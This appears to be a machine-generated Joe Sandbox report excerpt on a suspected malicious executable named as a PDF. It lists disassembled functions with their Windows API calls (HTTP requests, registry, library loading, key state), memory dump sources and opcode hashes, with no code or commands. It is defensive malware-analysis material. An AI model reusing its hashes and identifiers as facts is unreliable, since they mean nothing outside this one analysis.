                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$_memmove$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 365058703-1403004172
                                                            • Opcode ID: 2685fdbd7e6808bbc0ade71de2c4ac1adfe79d97d95437167d68a36d317fae4c
                                                            • Instruction ID: 12834d7497f57239712c3ae63e68cdebbfb64abf0d9e49c631d2550d99762969
                                                            • Opcode Fuzzy Hash: 2685fdbd7e6808bbc0ade71de2c4ac1adfe79d97d95437167d68a36d317fae4c
                                                            • Instruction Fuzzy Hash: 7521E471D40108BBDB18AB74DC868FFB778EF05360B144129FA29971F1DB354D4A9650
                                                            Function 000F410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0012D5EC
                                                              • Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66
                                                            • _memset.LIBCMT ref: 000F418D
                                                            • _wcscpy.LIBCMT ref: 000F41E1
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000F41F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                            • String ID: Line:
                                                            • API String ID: 3942752672-1585850449
                                                            • Opcode ID: ded881bbff626958bd649d42814f3db4a83df537450d865cb28c4247968d9cda
                                                            • Instruction ID: d04307e36d2f6803022fff2cff226183497b9b64239d96cce22b49bef497af27
                                                            • Opcode Fuzzy Hash: ded881bbff626958bd649d42814f3db4a83df537450d865cb28c4247968d9cda
                                                            • Instruction Fuzzy Hash: A331E4710083085AE735EB60DC45FFB77E8AF55300F10461EF689928A2EB789689D793
                                                            Function 00161B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00161B40
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00161B66
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00161B96
                                                            • InternetCloseHandle.WININET(00000000), ref: 00161BDD
                                                              • Part of subcall function 00162777: GetLastError.KERNEL32(?,?,00161B0B,00000000,00000000,00000001), ref: 0016278C
                                                              • Part of subcall function 00162777: SetEvent.KERNEL32(?,?,00161B0B,00000000,00000000,00000001), ref: 001627A1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                            • String ID:
                                                            • API String ID: 3113390036-3916222277
                                                            • Opcode ID: d4a67dc6c52654a35ae9ef28c12f55e91c63dcc82ead4128e172ba17ce9647dd
                                                            • Instruction ID: 84338113ea679694a9218a67621bff6f2045b99eab0211c4073bac753cb29e21
                                                            • Opcode Fuzzy Hash: d4a67dc6c52654a35ae9ef28c12f55e91c63dcc82ead4128e172ba17ce9647dd
                                                            • Instruction Fuzzy Hash: 1D21CDB2600208BFEB159F608C85EBF76FCEB59744F14412AF405A6640EB309D559761
                                                            Function 00176656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000F1D73
                                                              • Part of subcall function 000F1D35: GetStockObject.GDI32(00000011), ref: 000F1D87
                                                              • Part of subcall function 000F1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 000F1D91
                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 001766D0
                                                            • LoadLibraryW.KERNEL32(?), ref: 001766D7
                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 001766EC
                                                            • DestroyWindow.USER32(?), ref: 001766F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                            • String ID: SysAnimate32
                                                            • API String ID: 4146253029-1011021900
                                                            • Opcode ID: 9668d4a4e8cc18aa2a372279c3c1af92f2570250b140c11403f8b15fedf2c9d7
                                                            • Instruction ID: ce06d0fb3a67dde6dc99e1d31cbc433cc4014c99a5dc84d109f5e11702fd1d99
                                                            • Opcode Fuzzy Hash: 9668d4a4e8cc18aa2a372279c3c1af92f2570250b140c11403f8b15fedf2c9d7
                                                            • Instruction Fuzzy Hash: 7F219D75200A06ABEF104F64EC80EBB37BDFF59368F908629FA1892190D771CC919B60
                                                            Function 0015703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 0015705E
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00157091
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 001570A3
                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 001570DD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: 24cb9c1784bebd35f3afd59052bf3f00feb6f624ebd538c57953f92c3c162882
                                                            • Instruction ID: f44b62b7a41d4dc24690d901f6a5ab7614d913aa050060a5bc304e845a0cb664
                                                            • Opcode Fuzzy Hash: 24cb9c1784bebd35f3afd59052bf3f00feb6f624ebd538c57953f92c3c162882
                                                            • Instruction Fuzzy Hash: 7B218174504309EBDB209F29EC06A9AB7F8AF56721F204A19FCB1DB2D0D7709884CB50
                                                            Function 0015710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 0015712B
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0015715D
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 0015716E
                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 001571A8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: 28aae69b89aaaaf2426f0c5e4f902a33655709dca3504f5aa269e950807f3116
                                                            • Instruction ID: 47d73be0ffebc424de96e3bc42c35de36e5c578f8e6436c884e4c698b169deb3
                                                            • Opcode Fuzzy Hash: 28aae69b89aaaaf2426f0c5e4f902a33655709dca3504f5aa269e950807f3116
                                                            • Instruction Fuzzy Hash: E521F575504705DBDB209F28AC86AAAB7F8AF55331F20061DFCB1DB2D0D7709889CBA0
                                                            Function 0015AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0015AEBF
                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0015AF13
                                                            • __swprintf.LIBCMT ref: 0015AF2C
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,0017F910), ref: 0015AF6A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                            • String ID: %lu
                                                            • API String ID: 3164766367-685833217
                                                            • Opcode ID: 72c9043b7797120ae0e2fcdb05727e1d607cba73d44926c63ec284c1e7f1f996
                                                            • Instruction ID: 9cca4d87e743492eef4607af6524e8f7ae9155ca4059d453fd3a40c61fcb41a4
                                                            • Opcode Fuzzy Hash: 72c9043b7797120ae0e2fcdb05727e1d607cba73d44926c63ec284c1e7f1f996
                                                            • Instruction Fuzzy Hash: 88214134A00109AFCB10DF64CD85EEE7BB8EF49705B104069F909EB252DB71EA45DB61
                                                            Function 0014A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66
                                                              • Part of subcall function 0014A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0014A399
                                                              • Part of subcall function 0014A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0014A3AC
                                                              • Part of subcall function 0014A37C: GetCurrentThreadId.KERNEL32 ref: 0014A3B3
                                                              • Part of subcall function 0014A37C: AttachThreadInput.USER32(00000000), ref: 0014A3BA
                                                            • GetFocus.USER32 ref: 0014A554
                                                              • Part of subcall function 0014A3C5: GetParent.USER32(?), ref: 0014A3D3
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0014A59D
                                                            • EnumChildWindows.USER32(?,0014A615), ref: 0014A5C5
                                                            • __swprintf.LIBCMT ref: 0014A5DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                            • String ID: %s%d
                                                            • API String ID: 1941087503-1110647743
                                                            • Opcode ID: e1bf77cdda6f4b25458655db14e94afdb4ee1f7a646a1fcc2664fdac6ad85592
                                                            • Instruction ID: 32101d4b8c40ac7b7c604aac81115426eda0cdbc6b9d1d54d0858a7c61546044
                                                            • Opcode Fuzzy Hash: e1bf77cdda6f4b25458655db14e94afdb4ee1f7a646a1fcc2664fdac6ad85592
                                                            • Instruction Fuzzy Hash: F811A275680208ABDF11BF64DC85FEA3778AF48700F454079BA0CAA163DB7059869B76
                                                            Function 00152017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 00152048
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                            • API String ID: 3964851224-769500911
                                                            • Opcode ID: 8208a26ae9bd2682f56515068f8eba68b968d85d99fd4046d17cbe281c7e76e5
                                                            • Instruction ID: 20c54e1b352bb0d2959b266347c86528172dcc9e342bbd6e07b8cec1a55d8e6a
                                                            • Opcode Fuzzy Hash: 8208a26ae9bd2682f56515068f8eba68b968d85d99fd4046d17cbe281c7e76e5
                                                            • Instruction Fuzzy Hash: 1D116135900109DFCF04EFA4D9414FEB7B4FF26304B508468E8656B292EB32994ACB51
                                                            Function 0016EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0016EF1B
                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0016EF4B
                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0016F07E
                                                            • CloseHandle.KERNEL32(?), ref: 0016F0FF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                            • String ID:
                                                            • API String ID: 2364364464-0
                                                            • Opcode ID: 3ec19893a4de63cabe4736602fbcc9a9750a8deaaac5b82046d61efdd1917970
                                                            • Instruction ID: 2c1b40e6c95b7ae078ce0ce7c9ce2eedb474766cf224951b2cc8c0da460c3f30
                                                            • Opcode Fuzzy Hash: 3ec19893a4de63cabe4736602fbcc9a9750a8deaaac5b82046d61efdd1917970
                                                            • Instruction Fuzzy Hash: DC81A2716043019FD724DF28DC46F6AB7E5AF88720F14881DFA99DB692DB70AC41CB92
                                                            Function 001702C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                              • Part of subcall function 001710A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00170038,?,?), ref: 001710BC
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00170388
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001703C7
                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0017040E
                                                            • RegCloseKey.ADVAPI32(?,?), ref: 0017043A
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00170447
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                            • String ID:
                                                            • API String ID: 3440857362-0
                                                            • Opcode ID: 047007f0f8431c95f283f6df677e5ac845741df60e6b42d627058b896f057141
                                                            • Instruction ID: 96ef57e97ef62c606c95316625d5fcec7c20bc1ef1ca825b5d31900d2b41ba72
                                                            • Opcode Fuzzy Hash: 047007f0f8431c95f283f6df677e5ac845741df60e6b42d627058b896f057141
                                                            • Instruction Fuzzy Hash: 00512B71208304AFD705EB54DC81EAEB7F9FF88304F14892DB699972A2DB30E945DB52
                                                            Function 0016DBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
                                                              • Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C
                                                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0016DC3B
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0016DCBE
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0016DCDA
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0016DD1B
                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0016DD35
                                                              • Part of subcall function 000F5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00157B20,?,?,00000000), ref: 000F5B8C
                                                              • Part of subcall function 000F5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00157B20,?,?,00000000,?,?), ref: 000F5BB0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 327935632-0
                                                            • Opcode ID: c0593e2421dee908b1b8e7ba6d8ee15c4dbabd971bedf99a1242c0acc37a8d43
                                                            • Instruction ID: db38e7d98df9d8638018b1d7ea574a1e7478c3a1f56f2c357c4b19fafe128f23
                                                            • Opcode Fuzzy Hash: c0593e2421dee908b1b8e7ba6d8ee15c4dbabd971bedf99a1242c0acc37a8d43
                                                            • Instruction Fuzzy Hash: 50512B35A00609DFCB00EFA8D8849EDB7F4FF58310B158069EA19AB752DB70AD55CB91
                                                            Function 0015E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0015E88A
                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0015E8B3
                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0015E8F2
                                                              • Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
                                                              • Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C
                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0015E917
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0015E91F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1389676194-0
                                                            • Opcode ID: a5d3378d1389b15cd89df2caf5ce0805df542bfc14bf71dd9c4a968984b6f074
                                                            • Instruction ID: 1561f013af6961629a0934a1313fef266424fe9a093bc65fcd57bb5e0bb9ec80
                                                            • Opcode Fuzzy Hash: a5d3378d1389b15cd89df2caf5ce0805df542bfc14bf71dd9c4a968984b6f074
                                                            • Instruction Fuzzy Hash: 5E512D35A00209DFCF05EF64C981AAEBBF5EF08314B1480A9E909AB762CB31ED51DB51
                                                            Function 0017A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5ad15b2e8eeead99e7ab95fa782b9f04a0d792f83acd84af88c1ca77775a17a9
                                                            • Instruction ID: 406efbc73687b24c7fe4f63716e3591b651dbad81b9651dcc44e1ecf1ee82020
                                                            • Opcode Fuzzy Hash: 5ad15b2e8eeead99e7ab95fa782b9f04a0d792f83acd84af88c1ca77775a17a9
                                                            • Instruction Fuzzy Hash: D341E235900204ABC714DF28CC88BADBBB4FF89310F998165F95EA72E1C770AD81DA51
                                                            Function 000F2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 000F2357
                                                            • ScreenToClient.USER32(001B67B0,?), ref: 000F2374
                                                            • GetAsyncKeyState.USER32(00000001), ref: 000F2399
                                                            • GetAsyncKeyState.USER32(00000002), ref: 000F23A7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: AsyncState$ClientCursorScreen
                                                            • String ID:
                                                            • API String ID: 4210589936-0
                                                            • Opcode ID: 68876beb7add08ad25812354616f7f1310f47cc594ae055218a5ad9eec0d5752
                                                            • Instruction ID: 6e0788effaa0cddc0d280930077f0ae290f874bf2744e32c4abe5dce9c78acb0
                                                            • Opcode Fuzzy Hash: 68876beb7add08ad25812354616f7f1310f47cc594ae055218a5ad9eec0d5752
                                                            • Instruction Fuzzy Hash: 8A41C371504129FBCF199F64D844AFEBBB4FB15360F204319F92996290CB309EA4EFA1
                                                            Function 00146920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0014695D
                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 001469A9
